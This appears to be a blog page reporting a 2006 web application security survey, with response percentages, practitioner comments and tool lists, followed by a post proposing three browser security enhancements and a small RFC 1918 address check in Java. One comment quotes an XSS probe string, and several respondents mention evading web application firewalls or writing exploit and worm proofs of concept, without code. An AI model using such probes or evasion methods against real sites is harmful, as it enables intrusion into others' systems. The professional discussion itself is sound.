  • Submissions must be received by January 17, 2007

Publishing & Privacy Policy
  • Results based on aggregate data collected will be published
  • Absolutely no names or contact information will be released to anyone, though feel free to self publish your answers anywhere you’d like

Last Survey Results
December 2006


Questions

1) What type of organization do you work for?

a) Security vendor / consultant (60%)

b) Enterprise (9%)
c) Government (9%)
d) Educational institution (5%)
e) Other (14%)
No Answer (2%)


  • Agribusiness
  • My own webdevelopment company.
  • Health Care
  • I'm not telling. It's a publicly-held company, though.
  • Independant research and training
  • I work for none right now.
2) How would you rate your technical expertise in web application security?

a) Guru (21%)

b) Expert (47%)
c) Intermediate (28%)
d) Novice (2%)
e) I am Nessus (0%)
No Answer (2%)



  • Homestar says, "sewiousleeeee!"
3) What was your background before entering the web application security field?

a) Software Development (53%)

b) IT (16%)
c) QA (0%)
d) Product/Project Management (2%)
e) I'll never tell! (2%)
f) Other (please specify) (23%)
No Answer (2%)

  • technical sales in IT security
  • Penetration Tester
  • Information System Auditor
  • Network Penetration Testing
  • Network Security Engineer
  • New Hampshire mafia hitman/enforcer
  • An Electrical Engineering major, which i still am
  • Professional slacker/self taught
  • Before I started with the webappsec stuff I was a apprentice and there I had much to do with web development/design and IT at all.
4) From your experience, how many security professionals "get" web application security?


a) All or almost all (0%)

b) Most (19%)
c) About half (26%)
d) Some (49%)
e) None or very few (7%)


  • "To my experience the traditional "network security" guys still see WebAppSec as primarily a pet project or an oddity, at least in the government space. For example I am the only full time app sec engineer for a agency of about 8,000. If i had a staff of 10 we would still keep busy. "
  • "Most get web, since that's half of what the internet is (the other half is email). It's everything beyond the web that they don't get."
5) What are your thoughts about the Universal XSS vulnerability in Adobe’s Acrobat Reader Plugin?

a) Really bad (53%)

b) Bad (37%)
c) Never heard of it (2%)
d) Nothing new here, move along (5%)
e) Please stop with the FUD! (2%)



  • "It is certainly bad. Especially the bit with local file system access. But like all XSS vulnerabilities they have a high exploitability potential they are not that difficult to individually remediate (systematically is a whole different ball of wax)."
  • "What is really bad is the recommendations going around about how to fix this. Telling people to "upgrade their Acrobat" isn't the way to protect users NOW. Additionally, half the recommendations don't even account for the fact the information after a # sign in a URL is NOT sent back to the server, so the server side URL filtering jive isn't going to fix anything when it boils down to PDFs. In fact, this vulnerability is similar to just entering in "javascript:alert('xss')" in the address field of the browser -- the script runs, but it obviously would not be mitigated by running server side validation. The best approach I've seen is to change the MIME type sent back from the server from "pdf/application" to "pdf/octet" and also to add a "Content-Disposition: Attachment" header for outbound PDFs which prompts the user to download the PDF rather than running it in the browser."
  • "truly the best candidate for the most widespread worm to utilize"
  • "(I think its bad, and was a great find for 07. Really surprised it wasn't found any sooner)"
6) During your web application vulnerability assessments, how many websites were there that DID NOT have at least one relatively severe vulnerability?


a) All or almost all (2%)

b) Most (2%)
c) About half (2%)
d) Some (19%)
e) None or very few (74%)



7) What's your preferred acronym for Cross Site Request Forgery?


a) CSRF (58%)

b) XSRF (19%)
c) Neither, I prefer Session Riding (7%)
d) No preference (16%)



  • "Sea Surf!!!"
  • "We really need to stop using Cross Site for EVERYTHING."
  • "I don't care, though I like to say "sea-surf," I use "XSRF" in documentation because it is more consistent with XSS."
  • "After much gnashing of teeth over this question I had to come down on the side of the term that I believe best describes the attack. Plus, people will never agree on whether to use "C" or "X", so why not eliminate that problem? (fwiw, I prefer XSRF over CSRF just so it's consistent with XSS)"
  • "...how about one click attack?"
8) Does using Ajax technology open up new website attacks?

a) Yes (9%)

b) Yes, it adds some new things (35%)
c) No, but it increases the attacks surface (40%)
d) Nothing new here, move along (5%)
e) Other (9%)
No Answer (2%)


  • "Sorta. It makes developers more prone to make mistakes while the "attack surface" isn't really that much bigger the likleyhood of some of the same or old issues is greater. For example i find that AJAX developers have i higher tendency to use client side validation only. Not making the realization that AJAX is just like form submission just with a slicker front end. A POST is a POST people!"
  • "People extending their website to use AJAX does provide new potential entry points, I don't see how anyone can deny that. But using AJAX to create a complex attack could be done without AJAX using images to create GET requests and iframes to create POST requests."
  • "It's something that would otherwise be done server-side by PHP/ASP and thus closed source - so developers lose their security through obscurity."
  • "I think it will eventually, possibly as applications provide more features in order be used offline and with caching features. Innovation in this area (and thus new forms of attacks) are mainly coming from startups and non-enterprise companies, most of who do not have a process or funds for proper web application testing."
  • "It can increase the attack surface, but more importantly, Ajax technologies are being used to create better exploits. Focusing on whether using Ajax technologies creates new vulnerabilities is causing many people to look the wrong way when crossing the road."
  • "Adds more attack surface, and doesn't give you any new vuln types, but it does expose more general application logic/architecture nuances which an attacker could use to better infer inner app workings (and thus problem areas)."
9) Your recommendation about using web application firewalls?


a) Two thumbs up (21%)

b) One thumb up (47%)
c) Thumbs down (12%)
d) Profane gesture (9%)
No Answer (5%)


  • "modsecurity has saved me from several stupid bugs in third-party stuff"
  • "Obfuscation rules all firewall/ids. They sure do make alot of money for vendors tho. Spend it on secure software practices and training instead."
  • "I think it can add a layer of defense, but certainly does not fix the problem in our testing."
  • "In any for-profit business, it certainly makes financial sense to use them. The depth of defense they add far outweighs the setup cost and power usage."
  • "Most seem to be best used only as a learning tool to help you find how they can be improved and/or how your skills at detecting such attacks can happen and how you can prevent them from happening before turning to a firewall for protection."
  • "for now they are not so useful. During my security audits I developed some hacker methods to evade webapp firewalls (mod_security in particular) and I plan to write an article about it. They need to be improved."
  • "oh look this IDS will protect me against 0hday, oh shit wait we've just lost our file server due to RPC what?"
  • "I'm some what neutral on this. I think they can add to a defense in depth posture, but in most cases, time and resources are better spent going back up to the application level and training developers on how to write secure code, or by performing code reviews and blackbox testing. I may recommend these more as they become more advance and mature, but my experience is that they are not yet the best way to spend your resources."
  • "Up what? ;)"
  • "Unfortunately, many tend to assume WAF can fix bad code, but they cannot. Also, many think WAF alone are a sufficient counter measure to vulnerable and badly designed web applications, and they are not."
10) How would describe the current state of web browser security?


a) Rock solid (2%)

b) Could be better (51%)
c) Swiss cheese, fix it! (44%)
No Answer (2%)



  • "While browsers facilitate some web based attacks they really aren't to blame for a bunch of things. App developers should be responsible for their own work and not rely on browsers for their security. Anytime you "outsource" your security model is just asking for trouble."
  • "is there even any cheese left anymore? all i see is holes.."
  • "browsers are the least secure, most dangerous software we use, due primarily to the execution of "content-controlled" code. It will be a "big deal" for computer security as a whole if we manage to secure this platform."
  • "Things are in a pretty bad and scary state. "the browser is the operating system" so maybe there's no way to avoid it, but the frequency and number of vulnerabilities should be much lower for such a critical piece of software."
  • "The amount of functionality the average user expects of its web browser has increased remarkably along the past years. As a result, vendors made it more easy to extend the functionality of their products by use of third party software. Unfortunately, most of these have never been sufficiently reviewed from a security perspective. And, being vulnerable to security issues which have been long fixed in the core products, they reintroduce just these and taint the security level of the entire product. As long as plugins and widespread extensions reintroduce vulnerabilities into the commonly used web browsers, and they are widely used, the security of plain web browsers do not matter much."
11) Name your Top 3 web application security resources.
(Listed in order of popularity)
RSnake's Blog
OWASP
Jeremiah Grossman's Blog
The Web Security Mailing List
sla.ckers.org forum
Web Application Security Consortium
Security Focus Web Application Security List
GNUCITIZEN
cgisecurity
Security Focus
Hacking Exposed Web Applications, 2nd Edition (Joel Scambray, Mike Shema, Caleb Sima)
Full Disclosure
Google
BugTraq
XSS (Cross Site Scripting) Cheat Sheet
Secunia
Sylvan von Stuppe
BlackHat
Schneier on Security
PaulDotCom
Professional Pen Testing for Web Applications (Andres Andreu)
del.icio.us (webapp security)
FrSIRT
IEEE S&P
OSSTMM
(IN)SECURE Magazine
Software Security (Gary McGraw)
19 Deadly Sins of Software Security -(Michael Howard, David LeBlanc, John Viega)
SecuriTeam
qasec
WhiteHat Security
http://www.security.nnov.ru
Web Security Threat Classification
http://www.securityfocus.com/archive/107
How to Break Web Software (Mike Andrews, James A. Whittaker)
Microsoft
Security Focus Penetration Testing
SearchAppSecurity
National Vulnerability Database
ComputerWorld
Safari Bookshelf

12) What are your Top 3 tools to find vulnerabilities in websites? (NO BROWSERS!)
(Listed in order of popularity)
  • Paros
  • Burp Suite
  • By Hand / My Brain
  • Proprietary Tools
  • Nikto
  • WebScarab
  • Web Developer Toolbar
  • WebInspect / SPI Proxy
  • Tamper Data
  • CLI-based HTTP tools (wget, curl, netcat, lynx, links, elinks, LWP, etc)
  • Fiddler
  • Watchfire AppScan
  • Firebug
  • Nessus
  • RSnake's XSS Cheat Sheet
  • Watchfire HTTP Proxy
  • Achilles
  • nmap
  • Grabber
  • Acunetix
  • XSS Assistant
  • Live HTTP Headers
  • Ruby
  • Fierce
  • RFuzz
  • CAL9000
  • HTMangLe
  • Cenzic Hailstorm
  • Sensepost Crowbar
  • ISS
  • Wireshark
  • AnEC
  • Ethereal
  • Perl
  • Wikto
13) What are the Top 3 types of website attacks we're most likely to see a lot more of in 2007?
(Listed in order of popularity)
  • Cross-Site Scripting
  • Cross-Site Requests Forgery
  • Web Worms
  • XSS-Phishing (Phishing w/ Superbait)
  • SQL Injection
  • Web Services / XML Injection
  • Ajax-based Attacks
  • Logical Flaws
  • UXSS
  • Unknown Issues
  • Denial of Service
  • PHP Includes
  • Browser Plug-in / Extension Hacking
  • Exponential XSS
  • Backdooring Media Files
  • "chrome" attacks
  • internationalization and charsets
  • Privilege Escalation
  • Authentication attacks
  • Session Hi-Jacking
  • Mobile Code (Flash/Java)
  • Configuration issues
14) What was your information security New Year's resolution?
  • Less projects, more quality
  • To spend more time with my wife and less time thinking about security.
  • Finding vulnerabilities in FireFox
  • Start own research in a particular web app sec area.
  • Get a job doing WAVA full-time (no other hats or VA work)
  • 1024x768 ;-)
  • Learn to demonstrate exploits.
  • To say important things. If developers don't listen, it's the fault of WSJ for not defiling enough companies.
  • Start working in a security company?
  • White-list sites with JavaScript execution permissions
  • Blog more. (is that infosec related? Blogging on infosec topics...)
  • Become more involved (less of a lurker) in the web app security area.
  • More champaign while doing assessments!
  • Dang, go to defcon, toorcon again. Do more R + D, do some posting to the lists (I never do historically).
  • Continiue the learning process.
  • Keep the OWASP Kansas City chapter active and involved.
  • Be better than I was last year.
  • http://www.cgisecurity.com/2006/12/07
  • CISSP Certification?
  • To give back to the field more than i extract. i.e. to come up with new ideas or improve upon existing ones more than i learn from others' research.
  • I didn't make one. I slept through New years as well.
  • Not to make any more resolutions
  • Research more.
  • The last year was very interesting in security field and the new 2007 year will be also interesting and hot. There are very small amount of site which were security audit and every day new sites appear. So there are a lot of sites to look at their security
  • Finally understand that after doing this since 1998, clients won't learn, it won't save the world and getting old makes you more cynical
  • All your web 2.0 are belong to us ;)
  • Locate at least one huge issue that wakes up the browser community out of their web application security slumber.
  • Work to bring more education, awareness, and training to more developers and a wider audience than our standard security community.
  • never do blacklisting, white listing save life
  • Educate developers
  • Be up to date and do more research.
  • Build more tools and share knowledge - have fun :)
  • Get better
  • Get certified (QDSP, QPASP)
  • I will not get 0wn3d.
  • The booze.
15) What's the first thing you have or plan to learn/research/try/code/write in 2007?
  • XSS/CSRF combo attacks
  • Adding embedded Ruby support to a popular hex editor to make it the Emacs of reverse engineering.
  • Universal XSS Worm, but only as a PoC and personal information gain.
  • SANS course in forensics.
  • Attend my local OWASP meeting
  • Convince my Bose to provide more training
  • A better web goat bank than web goat bank,
  • Hopefully, a JavaScript functional analyzer?
  • Soon to be released to the public ...
  • Wish I could -- no time. Will be busy doing nothing but risk assessments on campus. Know the techniques and technologies, but I don't spent enough day-to-day doing them so I need to get more hands-on time which I should be getting.
  • Researching possible vulnerabilities within the .NET Framework.
  • Wrote an exploit for the UPDFXSS to scare the crap outta some execs. FUD is good for my paycheck!
  • Neato stuff, I prefer to keep it a secret. I'll just say it has to do with automated attacks.
  • Learn security weaknesses of web services and SOA architecture.
  • .net framework 3.0 object model weaknesses
  • Either a game server in PHP (not real time obviously) or a CMS built from the ground up with security and extensibility in mind.
  • UIML's and fuzzers
  • CISSP Certification and study up on IPS/IDS
  • Intranet hacking using Google Desktop Search
  • I plan learn more about buffer overflows and test for them as well as finding more ways to improve basic application errors and tactics for doing so. I will focus more on stand alone applications and less on webapp security maybe too but it all depends on
  • Complete a VMWare lab for Web Application testing
  • New trojan horse techniques.
  • For some time already I am planning to write my own security scanner (with unique features and functionality). And I plan to developed also web version (online web security scanner), and maybe just single web version.
  • I'm retiring and leaving security :0)
  • Play with XSS
  • Working on my webapp risk metrics and some other paperwork stuff in this field.
  • I've been thinking about interesting ways to do active detection and filtering of malicious traffic.
  • Working on ways to alert, help, and guide Ruby on Rails developers to write secure code.
  • too many to list,....how abt inventing new way to prevent webapps ... something like integration of code review and webapp firewall.
  • anti-dns pinning
  • Threat modeling
  • I want to code some assessment tool for firefox in xul.
  • Utility to crawl Ajax driven applications, seems interesting.
  • DNS pinning
  • Putting (ASP).NET under the microscope.
  • Not sure, I'll tell you when it's done.

3 Wishes for Web Browser Security

Web browser security is broken. Completely shattered.

Take the Top 10 Web Hacks of 2006 and the 60 more that follow to see what I mean. XSS, CSRF, and other attacks make it so bad we can’t be certain we’re the ones driving our browsers. Short of completely reinventing HTTP/HTML/JavaScript/Cookies and other fundamental Web technologies (not going to happen) there are a few things we can do. People will get infected with JavaScript Malware, but there’s no reason why we can’t limit the damage without impacting the user experience.

Here are 3 web browser security enhancements I’d like to see. The sooner the better.

1) Restrict websites with public IP’s from including content from websites with non-routable IP address (RFC 1918)

This restriction is designed to protect against Hacking Intranet Websites from the Outside (port scanning, fingerprinting, etc.). If JavaScript Malware can't force a browser to make non-routable IP requests, then there's not much left it can do, whether or not it has your private IP. I can't think of any good reason that a website with a public IP would legitimately need to include data from a private IP.
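
For reference, the check itself is trivial. Here is a tiny sketch of the RFC 1918 ranges involved (my illustration only, not a proposed browser implementation):

import java.net.InetAddress;
import java.net.UnknownHostException;

public final class Rfc1918 {

    /* True if the IPv4 address falls in one of the RFC 1918 private ranges:
       10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16. */
    public static boolean isPrivate(String ip) throws UnknownHostException {
        byte[] a = InetAddress.getByName(ip).getAddress();
        int first = a[0] & 0xFF;
        int second = a[1] & 0xFF;
        return first == 10
            || (first == 172 && second >= 16 && second <= 31)
            || (first == 192 && second == 168);
    }
}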

2) Browser integration of Secure Cache, Safe History, and Netcraft’s anti-XSS URL features in their toolbar

The name says it all. These are excellent extensions and provide a good amount of security that all users can benefit from. Collin Jackson, Andrew Bortz, Dan Boneh, and John Mitchell from Stanford and the guys from Netcraft did a great job. I don't know what Mozilla's policy is on this kind of thing, but this is one they should definitely consider building in by default. Another feature I'd like to see is restriction of non-alphanumeric characters in the fragment portion of the URL, designed to stop DOM-based XSS and UXSS.

3) Same-origin policy applied to the JavaScript Error Console
JavaScript errors from code located on DomainA should not be readable from DomainB. This enhancement is designed to protect against the Login/History Detection Hack. So when SCRIPT SRCing in a page from another domain (Gmail, Yahoo Mail, MSN, etc.), hoping to get a signature match, you'd be out of luck because you can't see the error message. This might hinder debugging in some cases, but not much I don't think.

Bonus

Content-Restrictions. Are we there yet?